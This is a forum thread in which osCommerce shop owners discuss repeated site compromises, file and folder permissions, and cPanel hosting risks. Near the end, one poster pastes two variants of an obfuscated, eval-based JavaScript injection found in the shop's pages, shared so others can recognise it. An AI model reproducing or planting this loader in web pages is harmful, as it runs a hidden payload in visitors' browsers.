successful hack attacks

[moustique_design 0]

Morning,

We have been building online shops with oscommerce for a couple of years now and never had any problems. Until this summer. Since summer though, many of our shops have been attacked, some using the vulnerability of the 777 directories and other smaller vulnerabilities which we have now fixed but now we just had another one with an SQL injection. It seems like a never-ending attack at the moment, one thing fixed, another one attacked... Do others notice an increase in (successful) attacks, too? Or is it just me...

I don't know what to do and where to start, anyone had a similar situation?

Thank you,

Anuschka

[♥Vger 9]

No folder should have permissions higher than 755, because 777 are FULL permissions for everyone! However, some hosts have their servers set up so badly that you have to have permissions of 777 on folders for your site to work - the answer, if they won't correct that, is find a new host!.

 

Saying that a site has been hacked when folders have permissions of 777 is like saying that your house was robbed when you left the back door wide open.

 

You should also be aware that many sites get hacked via an exploitation of the server. cPanel in particular is vulnerable to this sort of attack and gets exploited between 2 and 4 times a year, on average.

 

Vger

[eww 1]

what was the second attack from, how did they exploit?

[Coopco 8]

No folder should have permissions higher than 755, because 777 are FULL permissions for everyone! However, some hosts have their servers set up so badly that you have to have permissions of 777 on folders for your site to work - the answer, if they won't correct that, is find a new host!.

 

Saying that a site has been hacked when folders have permissions of 777 is like saying that your house was robbed when you left the back door wide open.

 

You should also be aware that many sites get hacked via an exploitation of the server. cPanel in particular is vulnerable to this sort of attack and gets exploited between 2 and 4 times a year, on average.

 

Vger

Does that apply to the backups directory and the graphs directory?

[moustique_design 0]

Hi there,

thank you for your replies.

Our shop has just been hacked again. :( We didn't even have the settings set to 777 yet - they were on 755. As I am not the developer, I have just put a html page in front of it to hide it, if you want to see the hack (it seems to be a Turkish one this time), please PM me, as I dont want to cause my customer more trouble than he has already and publicise it to Google etc.

 

But if you have all directories set to 755, how do you get around allowing your customers to upload images to the directories, as Coopco is asking: "does this apply to the graph ones, too"?

 

Anyway, the 777 doesnt seem to have been the problem, as that wasn't even done yet. The new version of the shop that we uploaded to amend the problem has been live for not even 4 weeks yet, and they already managed to get rid of the entire front page and say "this shop has been hacked by xyz".

 

Oh, and yes, we do use Cpanel-based hosting.

 

The second attack was the SQL injection, the first attack was just a few links that had been inserted onto all text-editor-based sites. Then there was another attack where someone had uploaded a malicious folder into the images folder, which seems to be our current problem.

 

Thanks,

Anuschka

[♥Vger 9]

If your folder permissions are 755 and your site got hacked, and you use cPanel then you must get your host to upgrade their version of cPanel.

 

It doesn't matter what security you apply to osCommerce if they are geting in via cPanel - and this does sound like a cPanel exploit.

 

Vger

[moustique_design 0]

Hi Vger,

how do you know that it could be Cpanel, and what do I need to look out for?

I have another host that we are currently testing and I'd move to them straight away but they also use Cpanel.

Are there any hosting companies you recommend for OsCommerce?

 

I just sent you a PM, I'd be interested in learning about getting the images directory to work with a 755 setting.

Thank you,

Anuschka

[moustique_design 0]

Another question - would it help if we added SSL to the entire site?

Anuschka

[Coopco 8]

Another question - would it help if we added SSL to the entire site?

Anuschka

No.

[moustique_design 0]

How do I find out which hosting is most secure? We have had not many nice experiences with hosting companies, either they are too big and anonymous, or not within our customers' price range.

How do I know that it is Cpanel for sure, and don't move host for the wrong reasons?

Thanks,

anuschka

[eyekandee 0]

Hi,

 

I've been using this hosting company for three years now and have had very little problems with them ( a couple downtime issues in three years). Their tech support is right on the ball and offer enough traffic and storage to meet any oscommerce site. Easy to use cpanel. The only thing is you have to add an extra IP to your account for the SSL, but its cheap enough not to be a big deal.

 

Our all the file that need to be protected on our site are set to 644 (which is 99% of our site) and we have no hack issues.

[moustique_design 0]

Hi Eyekandee,

thank you very much for this. My client is in the UK though and I need to keep the hosting there, too. I forgot to mention that, sorry! I found quite a few hosts in the US who are in line with whta Vger suggests but not that many in the UK. Maybe we're a bit behind on that here. :)

All the best,

Anuschka

[♥Vger 9]

Our all the file that need to be protected on our site are set to 644

 

That's the correct setting for files, but what settings do your folders have - 755 or 777 ?

 

Also, even 755 won't protect you from a cPanel hack.

 

Vger

[zhexiang 0]

So, all files must be set to 644?

 

Gosh, most of my files are set to 755 by default.

 

I should change it? Or play by luck, hope no hacking will occur?

[♥Vger 9]

All files, except for the two configure.php files,should be set to 644. The two configure.php files should be set to either 644, 444 or 400 - which setting is correct for those two files will depend on your hosting.

 

You should not have any files set to 755 permissions (only folders).

 

Vger

[apollowear 0]

All files, except for the two configure.php files,should be set to 644. The two configure.php files should be set to either 644, 444 or 400 - which setting is correct for those two files will depend on your hosting.

 

You should not have any files set to 755 permissions (only folders).

 

Vger

 

Hi,

 

So I should set ALL FILES to 644 (in my case) except for cinfigure.php. And all folders to 755?

 

Thanks!

[Jack_mcs 676]

Hi,

 

So I should set ALL FILES to 644 (in my case) except for cinfigure.php. And all folders to 755?

 

Thanks!

On a properly setup server, all directories should be set to 755. All files should be set to 644, except for the configure files and some files added by some contributions.

 

Jack

[zhexiang 0]

Good...i'm gonna die on this one... too many files to change..

 

See you all in afterlife... LOL...

[Jack_mcs 676]

Depending on your control panel, there may be a way to change whole directories at one time. Or your host could do it very easily, if they will. It wouldn't hurt to ask.

 

Jack

[Arctic Fox 0]

If I set anything to 6## that 'thing' will disappear from my FTP. For me it all has to be 7## for me to get access to it, or I have to contact my host to bring it back into view.

[♥valerif 0]

If I set anything to 6## that 'thing' will disappear from my FTP. For me it all has to be 7## for me to get access to it, or I have to contact my host to bring it back into view.

hello

i wonder what permission should be the sessions folder?

[sqldude 0]

Just wanted to share a script that appeared in several of our pages yesterday that caused our osC shop to stop loading on computers with any kind of decent Internet protection software (ie. Sophos and Norton Internet). It was partially our fault for not securing all of the directories and files but we are not web admins and did not realize that our host's one-click install did not secure the folders/files. In fairness, they did point us to the exact file and folders that were not secured so we could correct that but we had apparently already been injected at that point.

 

So, the script that was injected had two variants:

 

<script language=JavaScript>	function nbhebn15(p)	{	var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,43,28,60,46,37,45,44,56,6,0,0,0,0
,0,0,8,61,52,53,10,9,48,11,20,29,47,38,50,12,22,36,55,3,26,32,40,41,51,16,31,0,35
,0,0,0,0,30,0,34,2,18,49,21,59,39,24,54,27,17,42,5,25,4,7,58,57,62,19,23,13,15,33
,14,1);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(215^j&255);j>>=8;d-=2}else{d=6}}}eval©;}}nbhebn15('Sqj4VaGTrtqTiylTOly3taj4LbwfVaG6al17ryRsSNlJZDf0FJ4JdNl6qDfArR14Lly8SGyrPtRU
Bl_A0yqTgiys8jf7Vlw68KfTLKfTquf48cGJrg17Za0T8Zy331U6Zsjs5a1Tryf0RRfT0KXUiKf78lf0s
PXrgGy8Zfw0FQy8aty33QXAPQlJVyqJltsfKX0JLqG70ylqawsAOyl1fD1qCw1JO_q4iqRfraj4LNXq1Z
JJdNl6qDjqFfw')	</script><!-- shiandlee.org -->

 

 

<script language=JavaScript>	function wusrbn15(p)	{	var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,43,28,60,46,37,45,44,56,6,0,0,0,0
,0,0,8,61,52,53,10,9,48,11,20,29,47,38,50,12,22,36,55,3,26,32,40,41,51,16,31,0,35
,0,0,0,0,30,0,34,2,18,49,21,59,39,24,54,27,17,42,5,25,4,7,58,57,62,19,23,13,15,33
,14,1);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(215^j&255);j>>=8;d-=2}else{d=6}}}eval©;}}wusrbn15('Sqj4VaGTrtqTiylTOly3taj4LbwfVaG6al17ryRsSNlJZDf0FJ4JdNl6qDfArR14Lly8SGyrPtRU
Bl_A0yqTgiys8jf7Vlw68KfTLKfTquf48cGJrg17Za0T8Zy331U6Zsjs5a1Tryf0RRfT0KXUiKf78lf0s
PXrgGy8Zfw0FQy8aty33QXAPQlJVyqJltsfKX0JLqG70ylqawsAOyl1fD1qCw1JO_q4iqRfraj4LNXq1Z
JJdNl6qDjqFfw')	</script><!-- shiandlee.org -->

 

We found one of these scripts on the following pages just under the <body></body> tags:

 

catalog/index.php

catalog/default.php

admin/index.php

index333.html

index3334.html

 

So far, osC seems to be running fine with all directories at 755 and files at 644. We also reset our FTP passwords.

[Jan Zonjee 55]

Just wanted to share a script that appeared in several of our pages yesterday that caused our osC shop to stop loading on computers with any kind of decent Internet protection software

Looks familiar.

[php_Guy 0]

I don't see it mentioned yet so I'll post a link... This thread lists all the security mods and discusses some of the issues. I'd recommend installing them all. Also be sure to .htpasswd protect your admin folder. Do not rely on the built in password protection.

 

Security Mods

 

Good luck!

[webbydeb 0]

I have a great hosting provider, and there's no cpanel...different one (don't want to say!)

If you are interested in getting their name, pm me.